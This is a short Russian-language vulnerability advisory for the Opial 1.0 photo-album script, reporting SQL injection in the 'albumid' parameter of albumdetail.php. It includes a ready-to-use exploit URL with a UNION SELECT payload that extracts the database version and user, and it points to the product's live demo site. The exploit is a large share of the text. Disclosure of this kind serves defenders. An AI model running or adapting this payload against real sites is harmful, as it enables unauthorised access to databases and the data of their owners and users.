Программа: Opial 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «albumid» сценарием albumdetail.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://www.path.com/albumdetail.php?albumid=-31+union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,user(),16—

Демонстрация:

http://www.opial.com/demo/

Оставить мнение